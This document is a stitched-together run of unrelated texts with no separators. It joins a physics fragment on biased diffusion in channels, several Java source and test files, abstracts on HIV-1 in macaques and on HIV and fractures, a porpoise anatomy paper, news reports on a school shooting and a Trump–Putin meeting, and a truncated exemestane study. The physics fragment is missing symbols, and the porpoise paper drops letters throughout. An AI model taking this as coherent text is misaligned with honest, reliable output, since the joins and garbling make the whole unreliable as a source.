regime. It increasingly fails, however, for increasing bias strength F. At very strong bias, i.e., f → ∞ the biased diffusion becomes effectively "free" from entropic effects and expectedly approaches the free limit, given by k B T /, which renders the original, linear Sutherland-Einstein result in terms of the F -independent mobility = 1/. Put differently, the influence of entropic barriers caused by the bottlenecks becomes negligible at strong bias. Vice versa, the bell-shaped behavior of the ratio depicted with Fig. 6 reflects the fact that this effective diffusion is not increasing monotonically but rather exhibits an enhancement of effective diffusion at moderate bias (or scaling) values f, c.f. in the inset of Fig. 6. Conclusions In summary, we demonstrated the applicability of the equilibration approximation in describing biased diffusive transport occurring in narrow, irregularly shaped one-dimensional channel structures. The Fick-Jacobs (FJ) description which relies on the equilibration assumption allows for a treatment of the dynamics within an effective one-dimensional kinetic equation of the Smoluchowski form. Bottlenecks and other confining restrictions of available configuration space yield within this approximation an effective 1D diffusion equation exhibiting entropic barriers. Due to the intrinsic temperature dependence of the underlying entropic free energy contribution one finds for the transport phenomena in periodic channels possessing varying cross sections features that are radically different from conventional transport occurring in energetic periodic potential landscapes. The most striking difference between these two physical situations is that for a fixed channel geometry the dynamics is characterized by a single scaling parameter f = F L/(k B T ) which combines the external force F causing a drift, the period length L of the channel, and the thermal energy k B T. The latter presents a measure of the strength of the acting fluctuating thermal forces. This leads to an opposite temperature dependence of the mobility: While the mobility of a particle in an energetic potential increases with increasing temperature the mobility of a particle undergoing biased diffusion in an irregular channel decreases. The incorporation of the spatial variation of the channel width in terms of an entropic free energy contribution allows for a quantitative understanding of the dependence of the transport properties, like the nonlinear mobility, on parameters like force strength, channel topology or temperature. Moreover, the lateral steady-state probability densities P st (x) can be evaluated in analytical closed form within the reduced kinetic FJ approximation, see in the Appendix. Such an effective one-dimensional reduction of a complex diffusion dynamics with intricate boundary conditions at the confining walls certainly proves useful and beneficial for the quantitative description, design and control of diffusive transport along tortuous pores and alike. The latter situation dictates the stochastic farfrom-equilibrium transport in a great variety of biological and structured synthetic pores and confining cavities, such as buckyballs, zeolites and alike. As an example, this FJ approximation has successfully been used in describing the phenomenon of Stochastic Resonance (Hnggi, 2002;) in a 2D system exhibiting an entropic barrier (a). which simplifies to Upon rearranging the terms on the right hand side and integrating once more over a period, i.e. from 0 to 1, we find the first result Hereby, we made use of the normalization condition of the stationary probability, i.e., 0P st (x) dx = 1. The general relation between the steady-state probability current and the steady-state average particle current ( ) is = 1 0 dx (A 10) which implies that =. Thus, the transport current is given by the first main result, reading: By substituting Eq. (A 9) back into the Eq. (A 8) we obtain for the steady-state probability density in x-direction the second main result:
<filename>2-0-data-structures-and-algorithms/2-2-7-sorting-algo/src/main/java/com/bobobode/cs/MergeSort.java package com.bobobode.cs; import lombok.NonNull; import java.util.Arrays; public class MergeSort { public static void main(String[] args) { int[] array = new int[]{6, 5, 3, 1, 8, 7, 2, 4, 9}; var sortedArray = sort(array); Arrays.stream(sortedArray).forEach(System.out::print); } private static int[] sort(@NonNull int[] array) { if (array.length == 1) { return array; } else { int[] arrayLeft = Arrays.copyOfRange(array, 0, array.length / 2); int[] arrayRight = Arrays.copyOfRange(array, array.length / 2, array.length); arrayLeft = sort(arrayLeft); arrayRight = sort(arrayRight); Arrays.stream(arrayLeft).forEach(System.out::print); Arrays.stream(arrayRight).forEach(System.out::print); System.out.println(); return merge(arrayLeft, arrayRight); } } private static int[] merge(int[] arrayL, int[] arrayR) { int[] result = new int[arrayL.length + arrayR.length]; int leftIndex = 0; int rightIndex = 0; int mergedIndex = 0; while (leftIndex < arrayL.length && rightIndex < arrayR.length) { if (arrayL[leftIndex] < arrayR[rightIndex]) { result[mergedIndex] = arrayL[leftIndex]; leftIndex++; } else { result[mergedIndex] = arrayR[rightIndex]; rightIndex++; } mergedIndex++; } while (leftIndex < arrayL.length) { result[mergedIndex] = arrayL[leftIndex]; leftIndex++; mergedIndex++; } while (rightIndex < arrayR.length) { result[mergedIndex] = arrayR[rightIndex]; rightIndex++; mergedIndex++; } return result; } }
<gh_stars>1-10 package com.js.interpreter.runtime; import com.js.interpreter.runtime.exception.RuntimePascalException; public interface PascalReference<T>{ public abstract void set(T value); public abstract T get() throws RuntimePascalException; }
Vif Substitution Enables Persistent Infection of Pig-Tailed Macaques by Human Immunodeficiency Virus Type 1 ABSTRACT Among Old World monkeys, pig-tailed macaques (Pt) are uniquely susceptible to human immunodeficiency virus type 1 (HIV-1), although the infection does not persist. We demonstrate that the susceptibility of Pt T cells to HIV-1 infection is due to the absence of postentry inhibition by a TRIM5 isoform. Notably, substitution of the viral infectivity factor protein, Vif, with that from pathogenic SIVmne enabled replication of HIV-1 in Pt T cells in vitro. When inoculated into juvenile pig-tailed macaques, the Pt-tropic HIV-1 persistently replicated for more than 1.5 to 2 years, producing low but measurable plasma viral loads and persistent proviral DNA in peripheral blood mononuclear cells. It also elicited strong antibody responses. However, there was no decline in CD4+ T cells or evidence of disease. Surprisingly, the Pt-tropic HIV-1 was rapidly controlled when inoculated into newborn Pt macaques, although it transiently rebounded after 6 months. We identified two notable differences between the Pt-tropic HIV-1 and SIVmne. First, SIV Vif does not associate with Pt-tropic HIV-1 viral particles. Second, while Pt-tropic HIV-1 degrades both Pt APOBEC3G and APOBEC3F, it prevents their inclusion in virions to a lesser extent than pathogenic SIVmne. Thus, while SIV Vif is necessary for persistent infection by Pt-tropic HIV-1, improved expression and inhibition of APOBEC3 proteins may be required for robust viral replication in vivo. Additional adaptation of the virus may also be necessary to enhance viral replication. Nevertheless, our data suggest the potential for the pig-tailed macaque to be developed as an animal model of HIV-1 infection and disease.
<gh_stars>100-1000 package com.lyl.boon.net.api; import com.lyl.boon.net.entity.WanAndroidEntity; import retrofit2.http.GET; import retrofit2.http.Path; import rx.Observable; /** * Wing_Li * 2016/3/30. */ public interface WanAndroidApi { @GET("article/list/{page}/json") Observable<WanAndroidEntity> getWanAndroidList(@Path("page") int page); }
/** * @author Rohtash Singh Lakra * @version 1.0.0 * */ @Repository("customerRepository") public class CustomerRepositoryImpl implements CustomerRepository { public CustomerRepositoryImpl() { } /** * (non-Javadoc) * * @see com.rslakra.dspringcore.repository.CustomerRepository#findCustomers() */ @Override public List<Customer> findCustomers() { List<Customer> customers = new ArrayList<>(); customers.add(newCustomer("Rohtash", "Lakra")); customers.add(newCustomer("Rohtash", "Singh")); customers.add(newCustomer("Rohtash", "Singh", "Lakra")); customers.add(newCustomer("Sangita", "Lakra")); return customers; } /** * * @param firstName * @param lastName * @return */ private Customer newCustomer(String firstName, String lastName) { return newCustomer(firstName, null, lastName); } private Customer newCustomer(String firstName, String middleName, String lastName) { Customer customer = new Customer(); customer.setFirstName(firstName); customer.setMiddleName(middleName); customer.setLastName(lastName); return customer; } }
Occipital-Dural Muscle: A Specialized Myodural Bridge in Narrow-Ridge Finless Porpoise (Neophocaena Asiaorientalis) A dense bridge-like tissue named the myodural bridge (MDB) connecting the suboccipital muscles and the spinal dura mater was originally discovered in humans. Recent studies have revealed that the MDB conrmed a universal existing normal anatomical structure in mammals which is considered being signicant in physiological functions. Our previous investigations have conrmed the existence of MDB in the nless porpoises. We conduct this research to expound the specicity of the MDB in Neophocana asiaeorientalis (N.asiaeorientalis). Five carcasses of N.asiaeorientalis with formalin xation were used for this study. Two were used for head and neck CT scanning, three-dimensional reconstruction, and dissection of suboccipital region. One was used for P45 plastinated sheets observation. One was for histological analysis of suboccipital region. One was for Scanning electron microscopic study. The results showed that the MDB in N.asiaeorientalis is an independent muscle originated from the caudal border of occiput, directly extended through the posterior atlanto-occipital interspace and connected with the cervical spinal dura mater. Thus the MDB in N.asiaeorientalis is an independent and specialized muscle. Based on the origin and termination of this muscle, we could name it as Occipital-Dural Muscle. And the direct pull on the cervical spinal dura mater might affect the circulation of the cerebrospinal uid (CSF) by altering the volume of subarachnoid space of spine. Introduction In human body, the suboccipital region is a particularly intricate area that contains a bundle of connective tissue connecting the rectus capitis posterior minor (RCPmi) and cervical spinal dura mater (SDM) as an anatomical bridge. This bridge-type connection was rstly found in humans' atlanto-occipital interspace by Khan et al., termed as the myodural bridge (MDB) by Hack et al.. Subsequent studies revealed that the rectus capitis posterior major (RCPma), the nuchal ligament (NL), and the obliquus capitis inferior (OCI) also participated in the forming of MDB. Furthermore, researchers investigated that the MDB existed in more mammalian taxa including Macaca mulatta, Canis familiaris, Felis catus, Oryctolagus cuniculus, Ratus norvegicus, Cavia porcellus, and Indoasian nless porpoise. In addition, it was con rmed that this structure is also present in reptiles (Crocodylus siamensis), and avifauna (Columba livia and Gallus domesticus). This universal existence inferred that the MDB could be physiologically signi cant in both humans and other species. According to the morphology studies, the authors speculated that the MDB is related with the transmission of proprioception. Zheng et al. and Xu et al. proposed that the MDB could be an indispensable factor in modulating the dynamic circulation of the cerebrospinal uid (CSF). Narrow-ridged nless porpoise (N. asiaeorientalis) is one of the smallest cetaceans. Since 2017, Neophocaena asiaeorientalis has been placed endangered by the IUCN. Besides, A range of evidence revealed that nless porpoises is the most basal clade in existing porpoises of family Phocoenidae. A previous study has con rmed the existence of the MDB in Neophocaena phocaenoides, yet the posterior Atlanta-occipital (PAO) membrane was not found. In addition, the rst three vertebrae in Finless Porpoise were fused which resulted in the only remaining entrance of the MDB to the SDM was the atlanto-occipital interspace. More interestingly, we found a muscle inserting through the atlanto-occipital interspace, and terminated at the SDM, which might perform the role of the MDB in N.asiaeorientalis. According to the morphological studies of the nless porpoise, the suboccipital triangle was much different from humans and other species, in which we could not nd the obliquus muscle. Upon that, we initiated this research to investigate this muscle which insert the atlanto-occipital interspace in N.asiaeorientalis, gure out the relationship between this muscle and the MDB in humans, and infer the physiological function of it. Materials And Methods Analyzed specimens represent narrow-ridged nless porpoises (N.asiaeorientalis) that were killed incidentally in shing nets or were found washed ashore. They were successively collected in Dalian with the permission from Chinese Authorities for Animal Protection. The study of these carcasses was approved by the Ethics Committee of Dalian Medical University. All of the collected dead bodies were conducted arterial perfusion through the aorta with 10% formalin solution. All methods were carried out in accordance with relevant guidelines and regulations. Methods CT three-dimensional reconstruction Two specimens' heads and necks were continuously scanned by GE 128-row VCT, and dual phase serial computer tomography (CT) images were obtained, the slice thickness and pitch were set to 0.6mm. The images were analyzed for modeling and reconstruction in MIMICS software (MIMICS 18.0.0.525, Materialise, Leuven, Belgium). Dissection of postoccipital region Four specimens were dissected layer-by-layer at the posterior occipital region to expose the atlantooccipital interspace. A dorsal midline incision was made at the neck, the skin, subcutaneous fascia, and super cial neck muscles were gradually removed to expose deep post-occipital musculature. Subsequently, the rectus capitis dorsalis (RCD) was detached from its cranial attachment carefully to reveal the other muscle lying deep. The musculature and other structures in the atlanto-occipital interspace along with a part of cervical spinal dura mater were isolated as tissue block by an electric handsaw. The tissue blocks were preserved for histology and scanning electron microscope. The photographic documentations were carried out by Canon 7D and 450D camera. P45 sheet plastination One specimen of N.asiaeorientalis was sliced in sagittal section for p45 sheet plastination. The P45 sections are semi-transparent, durable slices with a clear delineation of the tissue morphology including the connective tissues. Anatomical structures in posterior occipital region and the connections between the postoccipital muscles and cervical spinal dura mater were observed. The experimental procedure of the technique is described as follow : Slicing. The embalmed specimens of the head and neck were frozen at -70℃ for two weeks and then embedded in polyurethane foam and frozen at -70℃ again for two days. After freezing, 3 mm sagittal slices were made from side to side with a high-speed band saw. Bleaching. All the slices were rinsed overnight in cold running water, and afterwards, the slices were immersed in 5% dioxogen overnight. Dehydration. After bleaching, the slices were dehydrated with 100% acetone by the freeze substitution method. Casting and forced impregnation. After dehydration, the casting mold was prepared. The slices were lifted from the acetone bath and placed between two glass plates. The molds were then lled with polyester (Hoffen polyester P45, Dalian Hoffen Bio-Technique Co. Ltd., Dalian, P. R. China.). The lled mold was placed upright into a vacuum chamber at room temperature for impregnation. The absolute pressure was slowly decreased to 20, 10, 5, and 0 mm Hg, according to the rate of bubble releasing. The pressure was maintained at 0 mm Hg until bubbling ceased. The impregnation time lasted for more than eight hours. Curing. After the vacuum was released, the air bubbles within the sheets were checked and removed. The top of the mold was clamped with large fold back clamps, and the sheet was then ready for curing. The sheets were cured using a heated water bath and were placed upright in the water bath at 40℃ for 3 days. After curing, the sheets were removed from the bath and cooled to room temperature in a rack. The slices were then removed from the at chamber and covered appropriately with adhesive plastic wrap for protection. The sheets were then observed and photographed. Histological study Two tissue blocks were prepared containing the postoccipital musculature, the periosteum of the adjacent cervical vertebrae and the occiput, adjoining spinal dura mater, and spinal cord. After washed in running water overnight, these tissue blocks were dehydrated with ethanol in increasing grades, passed through xylene, in ltrated and then embedded in para n wax. A rotary microtome was used to cut 10-mthick sections. Sections were mounted on the glass microscope slides, then rehydrated for Van Gieson (VG, picric acid and acid fuchsin) staining. The staining sections were analyzed and photographed under a Nikon Eclipse 80i light microscope, with the support of Nikon NIS image software. Scanning electron microscopic study Through layer-by-layer dissection, two tissue blocks were used for scanning electron microscope (SEM) study. After washing in running water overnight, the specimens were xed with 2.5% glutaraldehyde in 0.1 M phosphate buffer at PH 7.3 for more than 2h. Then, the specimens were repeatedly washed in the buffer solution. They were subsequently dehydrated through a graded alcohol series, vacuum dried with 100% tert-butyl alcohol, and sputter-coated with platinum by ION SPUTTER JFC-1100 ion sputtering equipment. Tissues of the specimens were observed under a scanning electron microscope (model FEI QUATA 200, voltage:20KV, manufacture: the Netherlands FEI company). Fibers connections were photographed, digitized and analyzed. CT three-dimensional reconstruction The reconstructed 3D model of cranium and cervical vertebrae of the N.asiaeorientalis demonstrated that the atlanto-occipital interspace was broader compared with humans and some other terrestrial mammals, to the cervical dura mater. The rst three cervical vertebrae merged into one unit. It was observed that either the spinous processes and the transverse processes fused as well (Fig. 1). Since the relationship of the bones were clearly demonstrated by 3D records, and it was also considered as a guidance of gross anatomy in this study. Gross anatomy With the fusion of the rst three vertebrae, the obliquus muscle vanished in N.asiaeorientlis. A rectus muscle was found in the deep post-occipital region (Fig. 2). The cranial attachment of this rectus muscle was at occiput, while the caudal attachment was at the transverse process of the fused cervical vertebrae. This muscle was rectus capitis dorsalis muscle (RCD). Another muscle was found underneath the RCD, which originated from the occiput, and ended at spinal dura mater. We named it 'the occipital-dural muscle' (Fig. 3). Yet the dorsal atlanto-occipital (DAO) membrane was not found in N.aisaeorientalis during the dissection. P45 sheets plastination Median sagittal sections of the plastination sheets showed that all the bers of the occipital-dural muscle extended into the atlanto-occipital interspace, attached to the cervical spinal dura mater ultimately (Fig. 4). The dorsal atlanto-occipital (DAO) membrane was not present throughout the observation of the sheets. In addition, we found a reverse angle between the cranial and spinal dura mater. Histology Through the histological analysis of VG staining, the relationship between the muscles, bony structures and cervical dura mater was clearly identi ed (Fig. 5). It was found that the proximal attachment of the RCD was on the occiput while the distal was the fused cervical vertebrae. All of the muscular bers of the occipital-dural muscle inserted into the atlanto-occipital interspace, terminated and merged with the spinal cervical dura mater directly. Neither could we nd the dorsal atlanto-occipital (DAO) membrane through the histological sections. The sections of VG staining showed that the occipital-dural muscle's muscular bers were stained in yellow, while entering the atlanto-occipital interspace, the extending bers turned to red, which revealed that the extended parts were collagenous bers as muscle tendon. Observation under scanning electron microscope On the sagittal section, the cervical spinal dura mater was composed of multi-layer ber bundles. Dorsal atlanto-occipital (DAO) membrane was absent in atlanto-occipital interspace under the scanning electron microscope either. It was found that the muscular bers of the occipital-dural muscle extended through the atlanto-occipital interspace, arranged in parallel, ran caudally and merged with the cervical spinal dura mater at the end. According to the observation, we saw the tendon ber of the occipital-dural muscle was knitted into the cervical spinal dura mater as a fusion (Fig. 6). Discussion The myodural bridge was described as a dense brous connection between the occipital-dural muscle and SDM by Hack et al.. Subsequent studies enriched this de nition stage by stage. Till now we have never found a species except the nless porpoises whose MDB was an isolated muscle, yet all of the muscle tendon nally terminated at the SDM. Meanwhile, the physiological signi cance of MDB was highly concerned in recent research. Sui et al. and Zheng et al. supported that the suboccipital muscles which connecting to the upper cervical spinal dura mater via MDB was proposed to provide power for cerebrospinal uid (CSF) circulation. Thereby, Xu et al. speculated that head movement could be signi cant contributor to CSF dynamics in craniocervical junction, besides mentioned factor such as heartbeat and respiration. Finless porpoises have a wide geographic range, distributing in shallow, costal water western Paci c and Indian oceans from the Persian Gulf to most of the Indo-Malay region and then northward through the waters of China (including the lower to middle reaches of the Yangtze River) to southern Japan and Korea. Narrow-ridge nless porpoises (N.asiaeorientalis), no dorsal n, and more slender than other porpoise species, with a exible neck. They have tubercles on its back from mid-back to tail, with a dorsal ridge anywhere from 0.2 to 1.2 cm wide. Regarding marine mammals, our team con rmed that the MDB existent in the nless porpoises (Neophocaena phocaenoids) and the sperm whale recently. Like most of marine mammals, N.asiaeorientalis have to hold their breath and dive while foraging in aquatic habitats. During dives, they are up against extensive apnea apparently, similar as their related species, harbor porpoises. To tolerate that, the dive response turned into a crucial necessary trait, which consists of bradycardia and peripheral vasoconstriction. Through this response, cardiac output and organ perfusion would be diminished, while the transient cessation of respiration proceeding simultaneously. However, aforementioned series of processes scarcely occurred in terrestrial mammals. That is, comparing to the terrestrial counterpart, marine mammals routinely confront challenges that stem from the dive response. Coincidentally, heartbeat and respiration were considered as crucial contributor to maintain the circulation of CSF, whereas marine mammals have to decrease. Here we found the MDB in N.asiaeorientalis was isolated as an independent muscle that originated from the occiput, extended through the atlanto-occipital interspace, and terminated at the spinal dura mater. It was already con rmed that this muscle was found in Neophocaena phocaenoids without PAO membrane performing the job of intermediate junction. Neither could we nd any other termination except the SDM in N.asiaeorientalis. In other words, pulling the SDM might be the main job of the occipital-dural muscle in N.asiaeorientalis. During nless porpoises' diving time, the lower heart rate and suspended respiration could not afford the power source to maintain the CSF's circulation, and simultaneously, a specialized muscle objectively existed which can provide powerful traction force to the SDM by the relative movement between head and neck. Thus we could predict that this muscle in N.asiaeorientalis plays an indispensable role on the dynamic circulation of CSF. Moreover, this mechanism is steadily sustainable due to continuous body motion during the bottom-time of nless porpoises. Therefore, we can call this unique and special functional muscle as the occipital-dural muscle. As subsequent research reported that myodural bridge universally existed in mammals, the MDB was considered as a highly evolutional conserved structure. The myodural bridge of N.asiaeorientalis is the strongest and most speci c one among the animals we have ever exam. Due to the absence of the PAO membrane, the occipital-dural muscle could insert the Atlanta-occipital interspace, attached to the dura mater directly. In addition, the scanning electron microscopic result revealed that the connection between the MDB and the dura mater is close-knit in N.asiaeorientalis, where the dense tissue of the MDB gradually fused with the SDM, and eventually became a part of the SDM. In summary, all the evidence above supports that, MDB in N.asiaeorientalis works e ciently as an isolated muscle named the occipital-dural muscle. Unlike humans, this muscle directly connects with the SDM in N.asiaeorientalis, transmits the strong traction force to the SDM, by muscular contraction and relaxation. Furthermore, the mechanism is also highly related to sustainable relative movement between occiput and the fusion of the rst three cervical vertebrae (Fig. 7). This mechanism is obviously more powerful and representative than that in humans and most of other species we have investigated before. Meanwhile, it enhances the credibility of the signi cant physiological function of MDB.
A US student who shot two school officials, killing one, had been suspended for 19 days just before the attack, officials have said. Robert Butler, who killed himself after the attack at his Nebraska school, had just been punished for driving over the school football pitch. Police said the gun he used belonged to his father, an Omaha police detective. No other students were injured in the attack. The school principal is in hospital and is expected to survive. Robert, 17, had recently transferred to Millard South High School in Omaha from Lincoln, another city where he had lived with his mother, the Omaha World-Herald reported. The newspaper reported that over the winter holidays Robert had been penalised by police for driving his car over the school football pitch and athletics track, and on the Wednesday morning before the attack was suspended from school by Vice Principal Vicki Kaspar. He went home, took a gun belonging to his father while his father was out of the house, and returned to school. After speaking to Ms Kaspar for several minutes with the door closed, he reportedly shot her several times in the chest, then shot Principal Curtis Case and fired more rounds. He fled and was later found dead of a self-inflicted gunshot wound in his still-running car, police told local media. Ms Kaspar, 58, later died in hospital; Mr Case, 45, was in serious condition in hospital. On a Facebook page, Butler apparently ranted that people would hear about "evil" things he had done and said the school had driven him to violence. Marissa Barton, who attends a school near Millard South, said her school was locked down and that students had gone into a panic after the shooting. "There is a sombre feeling throughout the city," she told the BBC. "This tragedy has hit the entire community hard. I'm still in shock."
Do people with HIV infection have a higher risk of fracture compared with those without HIV infection? Purpose of reviewThis review details recent findings that inform the prevalence and incidence of fractures in people living with HIV (PLWH) and examines the effects of HIV infection and antiretroviral therapy (ART), as well as demographics and traditional risk factors on fractures. As antiretroviral guidelines have recently changed to recommend the introduction of ART at diagnosis of HIV infection, the long-term effects of ART on bone health and fracture risk need to be better understood. Recent findingsIt is apparent that both the effects of HIV infection alone and initiation of ART are associated with significant bone loss in individuals with HIV infection, resulting in osteopenia and osteoporosis. The clinical consequence of low bone mineral density is a greater risk of fragility fractures that are more common in older HIV patients, and those on ART. Frailty occurs at a prevalence of about 10% (about twice that of the general population), and the increased propensity of falls results in greater fracture prevalence, morbidity and mortality. SummaryThis review examines data from recent cohort studies and clinical trials to inform a better understanding of the complex relationship between the effects of HIV infection, ART and demographics on fractures in PLWH.
<gh_stars>0 package pl.pjagielski; import static javax.ws.rs.core.Response.Status.BAD_REQUEST; import static javax.ws.rs.core.Response.Status.CREATED; import static javax.ws.rs.core.Response.Status.OK; import static junitparams.JUnitParamsRunner.$; import static org.fest.assertions.Assertions.assertThat; import javax.ws.rs.client.Client; import javax.ws.rs.client.ClientBuilder; import javax.ws.rs.client.Entity; import javax.ws.rs.client.WebTarget; import javax.ws.rs.core.Response; import org.joda.time.DateTime; import org.junit.AfterClass; import org.junit.Before; import org.junit.BeforeClass; import org.junit.Test; import org.junit.runner.RunWith; import com.fasterxml.jackson.databind.ObjectMapper; import com.fasterxml.jackson.datatype.joda.JodaModule; import com.fasterxml.jackson.jaxrs.json.JacksonJaxbJsonProvider; import com.fasterxml.jackson.jaxrs.json.JacksonJsonProvider; import junitparams.JUnitParamsRunner; import junitparams.Parameters; import pl.pjagielski.model.Todo; import pl.pjagielski.model.TodoBuilder; @RunWith(JUnitParamsRunner.class) public class TodoEndpointIntegrationTest { private static EmbeddedJetty embeddedJetty; private Client client = createClient(); private TodoEndpoint proxyClient; private Todo existingTodo; @Before public void setup() throws Exception { existingTodo = createTodo(); } @Test @Parameters(method = "provideValidTodosForCreation") public void shouldCreateTodo(Todo todo) { Response response = createTarget().request().post(Entity.json(todo)); assertThat(response.getStatus()).isEqualTo(CREATED.getStatusCode()); Todo createdTodo = response.readEntity(Todo.class); assertThat(createdTodo.getId()).isNotNull(); } private static Object[] provideValidTodosForCreation() { return $( new TodoBuilder().withDescription("test").withDueDate(DateTime.now()).build() ); } @Test @Parameters(method = "provideInvalidTodosForCreation") public void shouldRejectInvalidTodoWhenCreate(Todo todo) { Response response = createTarget().request().post(Entity.json(todo)); assertThat(response.getStatus()).isEqualTo(BAD_REQUEST.getStatusCode()); } private static Object[] provideInvalidTodosForCreation() { return $( new TodoBuilder().withDescription("test").build(), new TodoBuilder().withDueDate(DateTime.now()).build(), new TodoBuilder().withId(123L).build(), new TodoBuilder().build() ); } @Test @Parameters(method = "provideValidTodosForModification") public void shouldUpdateTodo(Todo todo) { DateTime now = DateTime.now(); Response response = createTarget().path(existingTodoId()).request().put(Entity.json(todo)); assertThat(response.getStatus()).isEqualTo(OK.getStatusCode()); Todo updatedTodo = response.readEntity(Todo.class); assertThat(updatedTodo.getDueDate().isAfter(now)); } private Object[] provideValidTodosForModification() { return $( new TodoBuilder().withDescription("test").withDueDate(DateTime.now()).build(), new TodoBuilder().withDescription("test").build(), new TodoBuilder().withDueDate(DateTime.now()).build() ); } @Test @Parameters(method = "provideInvalidTodosForModification") public void shouldRejectInvalidTodoWhenUpdate(Todo todo) { Response response = createTarget().request().post(Entity.json(todo)); assertThat(response.getStatus()).isEqualTo(BAD_REQUEST.getStatusCode()); } private Object[] provideInvalidTodosForModification() { return $( new TodoBuilder().withId(123L).build(), new TodoBuilder().build() ); } private WebTarget createTarget() { return client.target(embeddedJetty.getBaseUri()).path("todo"); } private Client createClient() { JacksonJsonProvider jacksonJsonProvider = new JacksonJaxbJsonProvider(); ObjectMapper objectMapper = new ObjectMapper(); objectMapper.registerModule(new JodaModule()); jacksonJsonProvider.setMapper(objectMapper); return ClientBuilder.newClient().register(jacksonJsonProvider); } private Todo createTodo() { Todo todo = new TodoBuilder() .withDescription("before") .withDueDate(DateTime.now().plusDays(30)) .build(); Response response = createTarget().request().post(Entity.json(todo)); return response.readEntity(Todo.class); } private String existingTodoId() { return String.format("%d", existingTodo.getId()); } @BeforeClass public static void beforeClass() throws Exception { embeddedJetty = new EmbeddedJetty(); embeddedJetty.start(); } @AfterClass public static void afterClass() throws Exception { embeddedJetty.stop(); } }
President Trump said shortly before landing in Japan Sunday that he expects to meet with Russian President Vladimir Putin during his 12-day trip to Asia. Trump told a gaggle of reporters during his flight to Japan that the two are expecting to meet to discuss North Korea. “I think it’s expected we’ll meet with Putin, yeah. We want Putin’s help on North Korea, and we’ll be meeting with a lot of different leaders," Trump said. The comment comes after Trump suggested earlier this week that the two world leaders might meet. ADVERTISEMENT Asked Thursday by Fox News host Laura Ingraham on "The Ingraham Angle" whether he will speak with Putin on his trip, Trump said, "We may have a meeting with Putin. And, again — Putin is very important because they can help us with North Korea." Trump and Putin first met in July during the Group of 20 summit in Hamburg, Germany. The bilateral meeting reportedly lasted for more than two hours, rather than the 30 minutes it had been scheduled for. This second meeting would come just days after the first indictments were handed down against Trump campaign staffers in special counsel Robert Mueller's probe into Russian election interference.
Exemestane potency is unchanged by common nonsynonymous polymorphisms in CYP19A1: results of a novel antiaromatase activity assay examining exemestane and its derivatives Abstract Exemestane (EXE) treats estrogen receptor positive (ER+) breast cancer in postmenopausal women by inhibiting the estrogensynthesizing cytochrome P450 CYP19A1. Variability in the severity and incidence of side effects as well as overall drug efficacy may be partially explained by genetic factors, including nonsynonymous variation in CYP19A1, also known as aromatase. The present study identified phase I EXE metabolites in human liver microsomes (HLM) and investigated mechanisms that may alter the extent of systemic estrogen deprivation in EXEtreated women with breast cancer, including whether functional polymorphisms in aromatase cause differential inhibition by EXE and whether EXE metabolites possess antiaromatase activity. The potency of EXE and ten of its derivatives was measured with HEK293overexpressed wild type aromatase (CYP19A1*1) using a rapid novel UPLC tandem mass spectrometry method. Of the ten compounds assayed, five were poor inhibitors (IC 50 50 mol/L) of wild type aromatase while five others, including the major metabolite, 17dihydroexemestane (17DHE), exhibited moderate potency, with IC 50 values ranging between 1.2 and 7.1 mol/L. The antiaromatase activity of EXE was also tested with two common allozymes, aromataseThr201Met (CYP19A1*3) and aromataseArg264Cys (CYP19A1*4). Differential inhibition of variant aromatase is unlikely to account for variable clinical outcomes as EXEmediated inhibition of aromataseThr201Met (IC 50 = 0.86 ± 0.12 mol/L) and aromataseArg264Cys (IC 50 = 1.7 ± 0.65 mol/L) did not significantly differ from wild type (IC 50 = 0.92 ± 0.17 mol/L). Although less potent than the parent drug, these results suggest that active metabolites may contribute to the therapeutic mechanism of EXE. Introduction Exemestane is a synthetic androgen prescribed to postmenopausal women with ER+ breast cancer (;). As an adjuvant endocrine therapy, EXE irreversibly inhibits the aromatasemediated production of estrogens from androgen precursors, a process known as aromatization (). A previous pharmacokinetics study found that the maximum plasma concentration of EXE in postmenopausal women with a prior history of breast cancer ranged from 3.0 to 15.6 ng/mL following 2 weeks of oral dosing (25 mg/day) while the maximum amount of its 17b-DHE metabolite varied 7-fold with reported values of 0.22-1.58 ng/mL (). Prescriptive information states that EXE is extensively metabolized, in part by aldo-keto reductases (AKRs). A key phase I metabolic pathway of EXE is C17 reduction to form a hydroxyl moiety vulnerable to phase II conjugation and excretion (). Recent studies independently confirmed that five purified hepatic cytosolic reductases, AKRs 1C1-4 and carbonyl reductase 1 (CBR1), reduce EXE to the active metabolite 17b-DHE (). Formation of 17a-dihydroexemestane (17a-DHE), a novel metabolite with unknown anti-aromatase activity (AAA), was catalyzed by AKR1C4 and CBR1 (). A second metabolic pathway in human liver preparations is C6 exomethylene oxidation by CYP3A4 to form multiple secondary metabolites. The chemical structures of the C6-oxidized metabolites, as well as detailed information regarding their capacity to inhibit aromatase are omitted from the product leaflet dispensed with EXE tablets. Several studies imply that EXE hepatic metabolism may be more complex than previously believed with possibly undiscovered metabolites and coaction by additional cytochrome P450s (CYP450s) (;). Comprehensively identifying phase I EXE metabolites is warranted, because EXE derivatives may contribute to systemic estrogen blockade through aromatase inhibition. The presence of 17b-DHE as a major metabolite in human plasma has been unequivocally confirmed in studies of postmenopausal women taking EXE (;). However, past attempts to identify less-studied metabolites have been speculative due to the lack of standard reference compounds. Using GC-MS, three peaks likely corresponding to C6-oxidized metabolites were detected in the urine of healthy male volunteers (Cavalcanti ). Another study found six metabolites, including 17b-DHE, in human urine following administration of radiolabeled EXE (). However, both studies of urinary EXE metabolites were hampered by a lack of comparison of physiochemical properties between the suspected metabolites and known standards. Six possible metabolite peaks were observed in human liver microsomes presented with EXE substrate (). One peak was confirmed to be 17b-DHE and another was tentatively designated as 6-hydroxymethylandrosta-1,4,6-triene-3,17-dione (6-HME) (). The identities of the remaining four peaks could not be established (). The current study addresses methodological issues that have historically undermined phase I EXE metabolite identification. First, a reference library of C6 and C17modified EXE analogs was synthesized to confirm the identity of suspected metabolites observed in incubations of EXE with human liver microsomes. Secondly, a newly developed UPLC/MS/MS method eliminates the need for organic extraction to remove residual substrate prior to analysis unlike previous scintillation-based studies of AAA (Thompson and Siiteri 1974). Instead, low levels of estrone formation are quantitated directly rather than extrapolated from tritiated water release during the aromatization of radiolabeled androstenedione. Interestingly, aromatase from human placental microsomes is used in traditional AAA screenings (Thompson and Siiteri 1974). CYP1A1 is well-expressed in human placenta and extensively metabolized EXE in an in vitro assay using recombinant baculosome-expressed CYP450s (;Uhl ). Therefore, background phase I metabolism in human placental microsomes may complicate the analysis of AAA assays. However, expression analysis has shown that HEK293 are CYP450 and UDPglucuronosyltransferase (UGT)-null (data not shown). To circumvent potential confounding from endogenous enzymes in placental preparations, aromatase-overexpressing HEK293 were created in the present study to evaluate the potency of EXE analogs in impeding estrogen biosynthesis. While it is 